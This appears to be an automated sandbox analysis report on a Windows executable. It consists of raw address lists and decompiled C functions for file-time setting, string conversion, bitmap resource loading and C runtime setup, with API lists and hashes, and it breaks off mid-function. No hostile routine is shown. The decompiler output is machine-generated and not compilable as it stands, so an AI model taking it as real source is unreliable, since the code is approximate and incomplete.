    0x008587fb
    0x00858800
    0x00858854
    0x0085885c
    0x0085885e
    0x00858860
    0x00858863
    0x00858863
    0x00858863
    0x00858869
    0x00858871
    0x00858884
    0x00858887
    0x00858889
    0x0085888c
    0x0085888d
    0x008588ae
    0x008588b1
    0x008588b1
    0x0085888f
    0x0085888f
    0x00858891
    0x0085889c
    0x0085889c
    0x0085889e
    0x008588a5
    0x008588a0
    0x008588a0
    0x008588a0
    0x0085889e
    0x008588b2
    0x008588b4
    0x008588b5
    0x008588b8
    0x008588ba
    0x008588ce
    0x008588bc
    0x008588bc
    0x008588bc
    0x008588d3
    0x008588d3
    0x008588d8
    0x008588db
    0x008588e6
    0x008588e6
    0x008588e6
    0x008588e6
    0x008588ea
    0x008588f1
    0x008588f2
    0x008588f5
    0x008588f8
    0x008588f8
    0x008588fa
    0x00000000
    0x00000000
    0x00858912
    0x00858919
    0x0085891d
    0x00858920
    0x00858923
    0x00858925
    0x00858925
    0x00858925
    0x00858927
    0x0085892a
    0x0085892d
    0x0085892f
    0x00858937
    0x0085893d
    0x00858940
    0x00858943
    0x00858944
    0x00858947
    0x0085894a
    0x0085894a
    0x0085894f
    0x00858952
    0x00000000
    0x00000000
    0x0085896a
    0x0085896f
    0x00858973
    0x00000000
    0x00000000
    0x00858977
    0x00858977
    0x0085897a
    0x0085897b
    0x0085897b
    0x0085897d
    0x00858980
    0x00000000
    0x00000000
    0x00858982
    0x00858985
    0x0085898c
    0x0085898f
    0x00858992
    0x008589a8
    0x008589a8
    0x008589a8
    0x00858994
    0x00858994
    0x00858996
    0x00858999
    0x008589a4
    0x0085899b
    0x0085899e
    0x0085899e
    0x00858999
    0x00000000
    0x00858992
    0x00858987
    0x00858987
    0x00858989
    0x00858989
    0x008588dd
    0x008588dd
    0x008588e0
    0x008589ab
    0x008589ab
    0x008589ad
    0x008589af
    0x008589b2
    0x008589b3
    0x008589b4
    0x008589b5
    0x008589bd
    0x008589bd
    0x008589bd
    0x008589bf
    0x008589c2
    0x008589c5
    0x008589c7
    0x008589c7
    0x008589c9
    0x008589db
    0x008589df
    0x008589e2
    0x008589e9
    0x008589f1
    0x008589f1
    0x008589f4
    0x008589f6
    0x00858a07
    0x00858a07
    0x00858a0b
    0x00858a0b
    0x00858a0e
    0x00858a10
    0x00858a13
    0x00000000
    0x008589f8
    0x008589f8
    0x008589fe
    0x008589fe
    0x00858a02
    0x00858a15
    0x00858a15
    0x00858a19
    0x00858a1a
    0x00858a1c
    0x00858a1e
    0x00858a5f
    0x00858a5f
    0x00858a61
    0x00858a6e
    0x00858a6e
    0x00858a70
    0x00858a72
    0x00858a73
    0x00858a74
    0x00858a7b
    0x00858a7e
    0x00858a80
    0x00858a80
    0x00858a81
    0x00858a83
    0x00858a86
    0x00858a86
    0x00858a88
    0x00858a8a
    0x00000000
    0x00858a8a
    0x00858a63
    0x00858a65
    0x00000000
    0x00000000
    0x00858a67
    0x00000000
    0x00000000
    0x00858a69
    0x00858a6c
    0x00000000
    0x00000000
    0x00000000
    0x00858a6c
    0x00858a25
    0x00858a2b
    0x00858a2b
    0x00858a2d
    0x00858a2e
    0x00858a2f
    0x00858a30
    0x00858a37
    0x00858a3a
    0x00858a3c
    0x00858a3d
    0x00858a3f
    0x00858a4c
    0x00858a4c
    0x00858a4e
    0x00858a50
    0x00858a51
    0x00858a52
    0x00858a59
    0x00858a5c
    0x00858a5e
    0x00858a5e
    0x00000000
    0x00858a5e
    0x00858a41
    0x00858a41
    0x00858a43
    0x00000000
    0x00000000
    0x00858a45
    0x00000000
    0x00000000
    0x00858a47
    0x00858a4a
    0x00000000
    0x00000000
    0x00000000
    0x00858a4a
    0x00858a27
    0x00858a29
    0x00000000
    0x00000000
    0x00000000
    0x00858a29
    0x008589fa
    0x008589fc
    0x00000000
    0x00000000
    0x00000000
    0x008589fc
    0x008589f6
    0x00000000
    0x008588e0
    0x008588db
    0x00858802
    0x00858804
    0x00000000
    0x00858806
    0x0085881c
    0x00858821
    0x00858823
    0x0085882f
    0x00858835
    0x00858836
    0x00858838
    0x0085883a
    0x00858845
    0x00858845
    0x00858848
    0x0085884a
    0x0085884a
    0x0085884d
    0x00858825
    0x00858825
    0x00858825
    0x00000000
    0x00858823
    0x008587d2
    0x008587d2
    0x008587d9
    0x008587da
    0x008587dc
    0x00858a8e
    0x00858a92
    0x00858a97
    0x00858a97
    0x00858aa6
    0x00858aa6

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: 91f601f58f35083189bfd89023f53da505b71da698404290d48592a166104e54
    • Instruction ID: 964ca2d81dccd9a210f9513fe0bec48be314608014a9ff0d8b33a6b65d5f1de3
    • Opcode Fuzzy Hash: 91f601f58f35083189bfd89023f53da505b71da698404290d48592a166104e54
    • Instruction Fuzzy Hash: FEA11571A04396DFEB12CF18C8917BEBFA5FF55311F18416BD885EB282CA348949C752
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0083A03A(void* __edx) {
    				signed char _t40;
    				void* _t41;
    				void* _t52;
    				signed char _t70;
    				void* _t79;
    				signed int* _t81;
    				signed int* _t84;
    				void* _t85;
    				signed int* _t88;
    				void* _t90;
    
    				_t79 = __edx;
    				E0084D9C0();
    				_t84 =  *(_t90 + 0x1038);
    				_t70 = 1;
    				if(_t84 == 0) {
    					L2:
    					 *(_t90 + 0x11) = 0;
    					L3:
    					_t81 =  *(_t90 + 0x1040);
    					if(_t81 == 0) {
    						L5:
    						 *(_t90 + 0x13) = 0;
    						L6:
    						_t88 =  *(_t90 + 0x1044);
    						if(_t88 == 0) {
    							L8:
    							 *(_t90 + 0x12) = 0;
    							L9:
    							_t40 = E00839F23( *(_t90 + 0x1038));
    							 *(_t90 + 0x18) = _t40;
    							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
    								_t70 = 0;
    							} else {
    								E0083A1D3( *((intOrPtr*)(_t90 + 0x103c)), 0);
    							}
    							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
    							 *(_t90 + 0x14) = _t41;
    							if(_t41 != 0xffffffff) {
    								L16:
    								if( *(_t90 + 0x11) != 0) {
    									E00840857(_t84, _t79, _t90 + 0x1c);
    								}
    								if( *(_t90 + 0x13) != 0) {
    									E00840857(_t81, _t79, _t90 + 0x2c);
    								}
    								if( *(_t90 + 0x12) != 0) {
    									E00840857(_t88, _t79, _t90 + 0x24);
    								}
    								_t85 =  *(_t90 + 0x14);
    								asm("sbb eax, eax");
    								asm("sbb eax, eax");
    								asm("sbb eax, eax");
    								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
    								_t52 = CloseHandle(_t85);
    								if(_t70 != 0) {
    									_t52 = E0083A1D3( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
    								}
    								goto L24;
    							} else {
    								_t52 = E0083B3C9( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
    								if(_t52 == 0) {
    									L24:
    									return _t52;
    								}
    								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
    								 *(_t90 + 0x14) = _t52;
    								if(_t52 == 0xffffffff) {
    									goto L24;
    								}
    								goto L16;
    							}
    						}
    						 *(_t90 + 0x12) = _t70;
    						if(( *_t88 | _t88[1]) != 0) {
    							goto L9;
    						}
    						goto L8;
    					}
    					 *(_t90 + 0x13) = _t70;
    					if(( *_t81 | _t81[1]) != 0) {
    						goto L6;
    					}
    					goto L5;
    				}
    				 *(_t90 + 0x11) = 1;
    				if(( *_t84 | _t84[1]) != 0) {
    					goto L3;
    				}
    				goto L2;
    			}













    0x0083a03a
    0x0083a03f
    0x0083a04b
    0x0083a052
    0x0083a056
    0x0083a063
    0x0083a063
    0x0083a067
    0x0083a067
    0x0083a070
    0x0083a07d
    0x0083a07d
    0x0083a081
    0x0083a081
    0x0083a08a
    0x0083a098
    0x0083a098
    0x0083a09c
    0x0083a0a3
    0x0083a0a8
    0x0083a0af
    0x0083a0c5
    0x0083a0b5
    0x0083a0be
    0x0083a0be
    0x0083a0e0
    0x0083a0e6
    0x0083a0ed
    0x0083a137
    0x0083a13c
    0x0083a145
    0x0083a145
    0x0083a14f
    0x0083a158
    0x0083a158
    0x0083a162
    0x0083a16b
    0x0083a16b
    0x0083a17b
    0x0083a17f
    0x0083a18f
    0x0083a19f
    0x0083a1a5
    0x0083a1ac
    0x0083a1b4
    0x0083a1c1
    0x0083a1c1
    0x00000000
    0x0083a0ef
    0x0083a100
    0x0083a107
    0x0083a1c6
    0x0083a1d0
    0x0083a1d0
    0x0083a124
    0x0083a12a
    0x0083a131
    0x00000000
    0x00000000
    0x00000000
    0x0083a131
    0x0083a0ed
    0x0083a092
    0x0083a096
    0x00000000
    0x00000000
    0x00000000
    0x0083a096
    0x0083a077
    0x0083a07b
    0x00000000
    0x00000000
    0x00000000
    0x0083a07b
    0x0083a05d
    0x0083a061
    0x00000000
    0x00000000
    0x00000000

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00837FC2,?,?,?), ref: 0083A0E0
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00837FC2,?,?), ref: 0083A124
    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00837FC2,?,?,?,?,?,?,?,?), ref: 0083A1A5
    • CloseHandle.KERNEL32(?,?,00000000,?,00837FC2,?,?,?,?,?,?,?,?,?,?,?), ref: 0083A1AC
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$Create$CloseHandleTime
    • String ID:
    • API String ID: 2287278272-0
    • Opcode ID: 14df57cf07f9d6cbb75c556f009d067ca00553eded576ca30bbaea9540455c89
    • Instruction ID: b92abf2c6d2ea4b9aca80a09d799cdaac185f0fcc7cf78308ab49393fd8a93b6
    • Opcode Fuzzy Hash: 14df57cf07f9d6cbb75c556f009d067ca00553eded576ca30bbaea9540455c89
    • Instruction Fuzzy Hash: 4041AA31248781AAE729DF28DC55BAFBBE8FB81700F04091DB5E1D7190C6A49A48DB93
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0085B645(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				char _v16;
    				intOrPtr _v24;
    				char _v28;
    				void* _v40;
    				signed int _t34;
    				signed int _t40;
    				int _t46;
    				int _t53;
    				void* _t55;
    				int _t57;
    				signed int _t63;
    				int _t67;
    				short* _t69;
    				signed int _t70;
    				short* _t71;
    
    				_t34 =  *0x86d668; // 0x14325215
    				_v8 = _t34 ^ _t70;
    				E008533B6(__ebx,  &_v28, __edx, _a4);
    				_t57 = _a24;
    				if(_t57 == 0) {
    					_t6 = _v24 + 8; // 0x47e85006
    					_t53 =  *_t6;
    					_t57 = _t53;
    					_a24 = _t53;
    				}
    				_t67 = 0;
    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
    				_v12 = _t40;
    				if(_t40 == 0) {
    					L15:
    					if(_v16 != 0) {
    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
    					}
    					return E0084E243(_v8 ^ _t70);
    				}
    				_t55 = _t40 + _t40;
    				asm("sbb eax, eax");
    				if((_t55 + 0x00000008 & _t40) == 0) {
    					_t69 = 0;
    					L11:
    					if(_t69 != 0) {
    						E0084E920(_t67, _t69, _t67, _t55);
    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
    						if(_t46 != 0) {
    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
    						}
    					}
    					L14:
    					E00859868(_t69);
    					goto L15;
    				}
    				asm("sbb eax, eax");
    				_t48 = _t40 & _t55 + 0x00000008;
    				_t63 = _t55 + 8;
    				if((_t40 & _t55 + 0x00000008) > 0x400) {
    					asm("sbb eax, eax");
    					_t69 = E00857B00(_t63, _t48 & _t63);
    					if(_t69 == 0) {
    						goto L14;
    					}
    					 *_t69 = 0xdddd;
    					L9:
    					_t69 =  &(_t69[4]);
    					goto L11;
    				}
    				asm("sbb eax, eax");
    				E00860F30();
    				_t69 = _t71;
    				if(_t69 == 0) {
    					goto L14;
    				}
    				 *_t69 = 0xcccc;
    				goto L9;
    			}




















    0x0085b64d
    0x0085b654
    0x0085b660
    0x0085b665
    0x0085b66a
    0x0085b66f
    0x0085b66f
    0x0085b672
    0x0085b674
    0x0085b674
    0x0085b679
    0x0085b692
    0x0085b698
    0x0085b69d
    0x0085b73c
    0x0085b740
    0x0085b745
    0x0085b745
    0x0085b761
    0x0085b761
    0x0085b6a3
    0x0085b6ab
    0x0085b6af
    0x0085b6fb
    0x0085b6fd
    0x0085b6ff
    0x0085b704
    0x0085b71b
    0x0085b723
    0x0085b733
    0x0085b733
    0x0085b723
    0x0085b735
    0x0085b736
    0x00000000
    0x0085b73b
    0x0085b6b6
    0x0085b6b8
    0x0085b6ba
    0x0085b6c2
    0x0085b6df
    0x0085b6e9
    0x0085b6ee
    0x00000000
    0x00000000
    0x0085b6f0
    0x0085b6f6
    0x0085b6f6
    0x00000000
    0x0085b6f6
    0x0085b6c6
    0x0085b6ca
    0x0085b6cf
    0x0085b6d3
    0x00000000
    0x00000000
    0x0085b6d5
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,47E85006,00853546,00000000,00000000,0085457B,?,0085457B,?,00000001,00853546,47E85006,00000001,0085457B,0085457B), ref: 0085B692
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085B71B
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0085B72D
    • __freea.LIBCMT ref: 0085B736
      • Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    • Opcode ID: a9e527d37b89e741281bbe68357aa4fb32ff9299618802ea8ad191b047555bdf
    • Instruction ID: ac93254dfca49371e8c2f972044dd179e674800f8828050f0226adc080afe618
    • Opcode Fuzzy Hash: a9e527d37b89e741281bbe68357aa4fb32ff9299618802ea8ad191b047555bdf
    • Instruction Fuzzy Hash: 8B31DE72A0020AABDF248F68DC85DAE7BA5FB64711F054168FC04DA290EB35DD58CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084A553(void* __edx, void* __fp0) {
    				intOrPtr _v20;
    				intOrPtr _v24;
    				void _v28;
    				void* _t11;
    				void* _t13;
    				signed int _t18;
    				signed int _t19;
    				void* _t21;
    				void* _t22;
    				void* _t26;
    				void* _t32;
    
    				_t32 = __fp0;
    				_t21 = __edx;
    				_t22 = LoadBitmapW( *0x870060, 0x65);
    				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
    				_t28 = _t19;
    				if(_t19 != 0) {
    					_t22 = E008496AD(0x65);
    				}
    				GetObjectW(_t22, 0x18,  &_v28);
    				if(E0084959D(_t28) != 0) {
    					if(_t19 != 0) {
    						_t26 = E008496AD(0x66);
    						if(_t26 != 0) {
    							DeleteObject(_t22);
    							_t22 = _t26;
    						}
    					}
    					_t11 = E008495FF(_v20);
    					_t13 = E008497D0(_t21, _t32, _t22, E008495BC(_v24), _t11);
    					DeleteObject(_t22);
    					_t22 = _t13;
    				}
    				return _t22;
    			}














    0x0084a553
    0x0084a553
    0x0084a569
    0x0084a56d
    0x0084a570
    0x0084a572
    0x0084a57b
    0x0084a57b
    0x0084a584
    0x0084a591
    0x0084a59c
    0x0084a5a5
    0x0084a5a9
    0x0084a5ac
    0x0084a5ae
    0x0084a5ae
    0x0084a5a9
    0x0084a5b3
    0x0084a5c3
    0x0084a5cb
    0x0084a5cd
    0x0084a5cf
    0x0084a5d7

    APIs
    • LoadBitmapW.USER32(00000065), ref: 0084A563
    • GetObjectW.GDI32(00000000,00000018,?), ref: 0084A584
    • DeleteObject.GDI32(00000000), ref: 0084A5AC
    • DeleteObject.GDI32(00000000), ref: 0084A5CB
      • Part of subcall function 008496AD: FindResourceW.KERNELBASE(00000066,PNG,?,?,0084A5A5,00000066), ref: 008496BE
      • Part of subcall function 008496AD: SizeofResource.KERNEL32(00000000,75085B70,?,?,0084A5A5,00000066), ref: 008496D6
      • Part of subcall function 008496AD: LoadResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496E9
      • Part of subcall function 008496AD: LockResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496F4
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
    • String ID:
    • API String ID: 142272564-0
    • Opcode ID: d58b3e20349dcd440b387862a0682efdd6b3a680f93321490f08df938541e045
    • Instruction ID: ea87af6915d35267a3c12dd707b9e121a3b151540b3fca82fc0b1c3999afba3c
    • Opcode Fuzzy Hash: d58b3e20349dcd440b387862a0682efdd6b3a680f93321490f08df938541e045
    • Instruction Fuzzy Hash: 61012B32A8020D27D621777C9C45F7F766DFFD5B61F0A0110FD40EB151DD528C0182A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 20%
    			E00851AC7(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t25;
    				void* _t27;
    				void* _t28;
    				intOrPtr _t30;
    				intOrPtr* _t32;
    				void* _t34;
    
    				_t29 = __edx;
    				_t27 = __ebx;
    				_t36 = _a28;
    				_t30 = _a8;
    				if(_a28 != 0) {
    					_push(_a28);
    					_push(_a24);
    					_push(_t30);
    					_push(_a4);
    					E00852116(__edx, _t36);
    					_t34 = _t34 + 0x10;
    				}
    				_t37 = _a40;
    				_push(_a4);
    				if(_a40 != 0) {
    					_push(_a40);
    				} else {
    					_push(_t30);
    				}
    				E0084F1DB(_t28);
    				_t32 = _a32;
    				_push( *_t32);
    				_push(_a20);
    				_push(_a16);
    				_push(_t30);
    				E00852318(_t27, _t28, _t29, _t30, _t37);
    				_push(0x100);
    				_push(_a36);
    				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
    				_push( *((intOrPtr*)(_a24 + 0xc)));
    				_push(_a20);
    				_push(_a12);
    				_push(_t30);
    				_push(_a4);
    				_t25 = E008518D1(_t29, _t32, _t37);
    				if(_t25 != 0) {
    					E0084F1A9(_t25, _t30);
    					return _t25;
    				}
    				return _t25;
    			}












    0x00851ac7
    0x00851ac7
    0x00851aca
    0x00851acf
    0x00851ad2
    0x00851ad4
    0x00851ad7
    0x00851ada
    0x00851adb
    0x00851ade
    0x00851ae3
    0x00851ae3
    0x00851ae6
    0x00851aea
    0x00851aed
    0x00851af2
    0x00851aef
    0x00851aef
    0x00851aef
    0x00851af5
    0x00851afb
    0x00851afe
    0x00851b00
    0x00851b03
    0x00851b06
    0x00851b07
    0x00851b10
    0x00851b15
    0x00851b18
    0x00851b1e
    0x00851b21
    0x00851b24
    0x00851b27
    0x00851b28
    0x00851b2b
    0x00851b36
    0x00851b3a
    0x00000000
    0x00851b3a
    0x00851b41

    APIs
    • ___BuildCatchObject.LIBVCRUNTIME ref: 00851ADE
      • Part of subcall function 00852116: ___AdjustPointer.LIBCMT ref: 00852160
    • _UnwindNestedFrames.LIBCMT ref: 00851AF5
    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00851B07
    • CallCatchBlock.LIBVCRUNTIME ref: 00851B2B
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
    • String ID:
    • API String ID: 2633735394-0
    • Opcode ID: e3da2a47c8b844266460c9267bddc60f008fad40a125ee031368b8d419d6242b
    • Instruction ID: 53b8a19a5a8f49e8048119df54e4f3c56cba5f322639ebe3a1da87fec520a603
    • Opcode Fuzzy Hash: e3da2a47c8b844266460c9267bddc60f008fad40a125ee031368b8d419d6242b
    • Instruction Fuzzy Hash: E6012932000109BBCF129F59CC05EDA3BBAFF49755F048018FE18A2121D776E865DBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E008515E6() {
    				void* _t4;
    				void* _t8;
    
    				E00852A14();
    				E008529A8();
    				if(E008526CE() != 0) {
    					_t4 = E00851726(_t8, __eflags);
    					__eflags = _t4;
    					if(_t4 != 0) {
    						return 1;
    					} else {
    						E0085270A();
    						goto L1;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}





    0x008515e6
    0x008515eb
    0x008515f7
    0x008515fc
    0x00851601
    0x00851603
    0x0085160e
    0x00851605
    0x00851605
    0x00000000
    0x00851605
    0x008515f9
    0x008515f9
    0x008515fb
    0x008515fb

    APIs
    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 008515E6
    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 008515EB
    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 008515F0
      • Part of subcall function 008526CE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 008526DF
    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00851605
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
    • String ID:
    • API String ID: 1761009282-0
    • Opcode ID: ddf0adde804129e3e3aff551b43878df0a9a162d909846b3bb4641761f25f26c
    • Instruction ID: 2e314ab051d43ac8a9451847d41767add630b46f44791c4f2426b6acfdfc8104
    • Opcode Fuzzy Hash: ddf0adde804129e3e3aff551b43878df0a9a162d909846b3bb4641761f25f26c
    • Instruction Fuzzy Hash: 0DC04C58050641541C647ABC221A7AD0780FDB77D7F9015D1FD51E71176E15440F9937
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 51%
    			E008497D0(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
    				signed int _v0;
    				signed int _v4;
    				void _v68;
    				signed int _v72;
    				signed int _v76;
    				char _v112;
    				intOrPtr _v116;
    				intOrPtr* _v120;
    				short _v122;
    				short _v124;
    				signed int _v128;
    				signed int _v132;
    				signed int _v136;
    				intOrPtr* _v140;
    				char _v144;
    				intOrPtr* _v152;
    				intOrPtr _v156;
    				intOrPtr* _v164;
    				char _v180;
    				intOrPtr* _v184;
    				intOrPtr* _v192;
    				intOrPtr* _v200;
    				intOrPtr* _v212;
    				signed int _v216;
    				signed int _v220;
    				intOrPtr* _v224;
    				char _v228;
    				intOrPtr _v232;
    				void* __edi;
    				signed int _t71;
    				intOrPtr* _t77;
    				void* _t78;
    				intOrPtr* _t79;
    				intOrPtr* _t81;
    				short _t89;
    				intOrPtr* _t93;
    				intOrPtr* _t95;
    				intOrPtr* _t97;
    				intOrPtr* _t101;
    				signed int _t103;
    				intOrPtr* _t111;
    				intOrPtr* _t113;
    				intOrPtr* _t115;
    				signed int _t120;
    				intOrPtr _t124;
    				intOrPtr* _t132;
    				intOrPtr* _t134;
    				void* _t146;
    				void* _t149;
    				signed int _t152;
    				void* _t154;
    				long long* _t155;
    				long long _t158;
    
    				_t158 = __fp0;
    				if(E00849682() != 0) {
    					_t146 = _a4;
    					GetObjectW(_t146, 0x18,  &_v68);
    					_t152 = _v4;
    					_t120 = _v0;
    					asm("cdq");
    					_t71 = _v72 * _t152 / _v76;
    					if(_t71 < _t120) {
    						_t120 = _t71;
    					}
    					_t149 = 0;
    					_push( &_v112);
    					_push(0x8633ac);
    					_push(1);
    					_push(0);
    					_push(0x86417c);
    					if( *0x86dff4() < 0) {
    						L18:
    						return _t146;
    					} else {
    						_t77 = _v132;
    						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
    						_t79 = _v152;
    						if(_t78 >= 0) {
    							_v144 = 0;
    							_push( &_v144);
    							_push(_t79);
    							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
    								_t81 = _v152;
    								asm("fldz");
    								_push(0);
    								_t124 =  *_t81;
    								_push(_t124);
    								_push(_t124);
    								 *_t155 = _t158;
    								_push(0);
    								_push(0);
    								_push(0x86418c);
    								_push(_v156);
    								_push(_t81);
    								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
    									E0084E920(_t146,  &_v136, 0, 0x2c);
    									_v136 = 0x28;
    									_v132 = _t152;
    									_v120 = 0;
    									_v128 =  ~_t120;
    									_v124 = 1;
    									_t89 = 0x20;
    									_v122 = _t89;
    									_t154 =  *0x86dedc(0,  &_v136, 0,  &_v180, 0, 0);
    									asm("sbb ecx, ecx");
    									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
    										_t132 = _v216;
    										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
    										_t101 = _v120;
    										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
    										_t103 = _v136;
    										_push(_v232);
    										_t134 = _v140;
    										_v220 = _t103;
    										_v228 = 0;
    										_v224 = 0;
    										_v216 = _t120;
    										_push(_t103 * _t120 << 2);
    										_push(_v136 << 2);
    										_push( &_v228);
    										_push(_t134);
    										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
    											DeleteObject(_t154);
    										} else {
    											_t149 = _t154;
    										}
    										_t111 = _v164;
